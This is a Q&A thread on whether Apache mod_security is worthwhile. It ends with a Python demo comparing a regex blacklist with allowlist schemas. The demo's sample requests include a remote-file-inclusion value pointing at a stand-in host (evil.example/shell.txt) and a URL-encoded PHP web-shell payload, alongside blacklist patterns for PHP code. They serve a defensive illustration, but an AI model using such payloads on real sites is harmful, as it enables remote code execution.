PHP – Is mod_security a good thing?

PHP

I've recently been frequented by erroneous error messages from mod_security. Its filter sets cover outdated PHP exploits, and I have to rewrite my stuff because WordPress & Co. had bugs years ago.

Does this happen to anyone else?

Apache mod_security blocks possibly dangerous HTTP requests before they reach applications (PHP specifically). It uses various filter sets, mostly regex based.

So I have a nice shared hosting provider, technically apt and stuff. But this bugged me:

Just last week I had to change a parameter name &src= in one of my apps because mod_security blocks ANY requests with that. I didn't look up its details, but this filter rule was preventing the exploitability of another app which I don't use and probably never had heard about. Still I had to rewrite my code (renaming the parameter often suffices to trick mod_security), which had nothing to do with or in common with that!

And today, a silly regex blocks form submissions, because I wanted to submit PHP sample code. Granted, this is the simple stuff that mod_security is there to protect against. But I don't believe mod_security can detect seriously obfuscated code, and it just goes off at obvious (and in this case totally trivial) PHP snippets.

Basically I'm getting penalized by mod_security because other people released bug-prone apps. (Not saying my apps are ultra secure – I'm pretty security-wary, but make no hyperbolic claims.)
I've already asked my provider to disable it anyway; the benefits are too minuscule, IMO, for my apps.


What do you think? Does mod_security make much sense outside of WP hosting? Or is it really just a bunch of blacklists of long passed security bugs? Which of its rules are actually helpful? Is there an application level equivalent?

Best Answer

I personally see mod_security as a patch. I use it on some of our servers where we can't control the code that's uploaded (shared hosting servers, for example), but it's never really felt like a good solution to me. Based on its wide and very general blacklist approach, it's more of a patch to cover up security holes than a good security policy.

It can also provide a false sense of security. mod_security can reveal some common attacks but can by no means prevent any attack. Again, it's a blacklist of common known attacks. If you simply install mod_security and think that you're magically secure, you're horribly mistaken.

I have found a much better policy to be managed servers where my team reviews all code that is placed on them, combined with lots of logs, logfile analysis, reporting systems, and intrusion detection/intrusion prevention systems (IDS/IPS). Every time third-party or open-source software is installed (I'm looking at you, WordPress!) we keep a log of where it was installed, and when new versions are released we update every copy that was installed.

Again, you're more likely to find mod_security on a shared hosting server, as you're experiencing now. As you grow you can move to a VPS or cloud-based hosting provider where you get your own managed environment and can more tightly control the available software.
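The two complaints in the question (a benign `src=` parameter and a pasted PHP snippet both getting blocked, while renaming a parameter gets past the rule) and the answer's point that a generic regex blacklist is a patch rather than a policy can be shown side by side in code. The following is an added example written for this page, not code from the original question, the answer, or the ModSecurity project. The two blacklist patterns are illustrative stand-ins for regex-based rules and are not copied from any real rule set; the endpoints `/gallery` and `/paste`, their fields, and the sample requests are all constructed for the example. Real ModSecurity also applies transformation functions (URL decoding and the like) before matching, which this simplified matcher approximates by matching on already-decoded parameters.

```python
import re
from urllib.parse import urlsplit, parse_qs

# ---------------------------------------------------------------------------
# 1. A regex blacklist in the spirit of generic mod_security rules.
#    Both patterns are written for this example, not taken from a real rule set.
# ---------------------------------------------------------------------------
BLACKLIST = [
    # Rule A: any request carrying a parameter called "src" (the poster's complaint)
    ("deny-src-param", "name", re.compile(r"\Asrc\Z", re.I)),
    # Rule B: anything in a value that looks like PHP code
    ("deny-php-code", "value", re.compile(r"<\?php|\beval\s*\(", re.I)),
]


def blacklist_verdict(params):
    """Return the id of the first rule that fires, or None if the request passes.

    params: dict of decoded parameter name -> list of values, i.e. what the
    application (or a WAF after its URL-decode transformation) sees.
    """
    for rule_id, target, rx in BLACKLIST:
        for name, values in params.items():
            haystacks = [name] if target == "name" else values
            if any(rx.search(h) for h in haystacks):
                return rule_id
    return None


# ---------------------------------------------------------------------------
# 2. The application-level alternative: a positive schema per endpoint.
#    Paths and fields are hypothetical; each parameter is checked against
#    what the application actually accepts, so the check cannot be "renamed around".
# ---------------------------------------------------------------------------
ALLOWLIST = {
    # image viewer: "src" must be a plain local file name, never a URL
    "/gallery": {
        "src": re.compile(r"\A[A-Za-z0-9_-]{1,64}\.(?:jpg|png|gif)\Z"),
        "page": re.compile(r"\A[0-9]{1,4}\Z"),
    },
    # pastebin: "code" is free text that is stored and HTML-escaped, never executed,
    # so PHP source in it is legitimate input for this endpoint
    "/paste": {
        "title": re.compile(r"\A[^\r\n]{1,120}\Z"),
        "code": re.compile(r"\A[\s\S]{1,20000}\Z"),
    },
}


def allowlist_verdict(path, params):
    """Return None if every parameter matches the endpoint's schema, else a reason."""
    schema = ALLOWLIST.get(path)
    if schema is None:
        return "unknown endpoint %s" % path
    for name, values in params.items():
        if name not in schema:
            return "unexpected parameter %r" % name
        if not all(schema[name].fullmatch(v) for v in values):
            return "value of %r does not match schema" % name
    return None


def parse_request(method, url, body=""):
    """Split a constructed request into (path, decoded params); query and body are merged."""
    parts = urlsplit(url)
    params = parse_qs(parts.query, keep_blank_values=True)
    if method == "POST":
        for k, v in parse_qs(body, keep_blank_values=True).items():
            params.setdefault(k, []).extend(v)
    return parts.path, params


def evaluate(method, url, body=""):
    """Run one request through both filters; returns (blacklist_rule_or_None, allowlist_reason_or_None)."""
    path, params = parse_request(method, url, body)
    return blacklist_verdict(params), allowlist_verdict(path, params)


# Constructed sample traffic (not captured from any real server).
SAMPLES = [
    # benign: a local image name in "src" -> blacklist false positive, allowlist passes
    ("GET", "/gallery?src=cat.jpg&page=2", ""),
    # benign: a user pasting "<?php echo 'hi'; ?>" as text -> blacklist false positive, allowlist passes
    ("POST", "/paste", "title=hello&code=%3C%3Fphp+echo+%27hi%27%3B+%3F%3E"),
    # attack: remote-URL value, but in a parameter rule A does not watch -> blacklist passes, allowlist rejects
    ("GET", "/gallery?page=http://evil.example/shell.txt", ""),
    # attack: "<?=system($_GET[c])?>" uses none of the tokens rule B looks for -> blacklist passes, allowlist rejects
    ("GET", "/gallery?page=%3C%3F%3Dsystem%28%24_GET%5Bc%5D%29%3F%3E", ""),
]


def run_samples():
    """Evaluate every sample request; returns a list of (blacklist, allowlist) verdicts."""
    return [evaluate(*s) for s in SAMPLES]


if __name__ == "__main__":
    for (method, url, body), (bl, al) in zip(SAMPLES, run_samples()):
        print(" ".join(x for x in (method, url, body) if x))
        print("  blacklist: %s   allowlist: %s" % (bl or "pass", al or "pass"))
```

Running it prints the two benign requests being blocked by the blacklist while passing the schema, and the two attack variants passing the blacklist while failing the schema; the blacklist keys on spelling, the schema keys on meaning. For the poster's actual situation, the practical alternative to renaming a parameter is a per-location rule exclusion in the ModSecurity configuration (`SecRuleRemoveById` or `SecRuleUpdateTargetById` scoped to the affected path), which keeps the rule for everything else.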
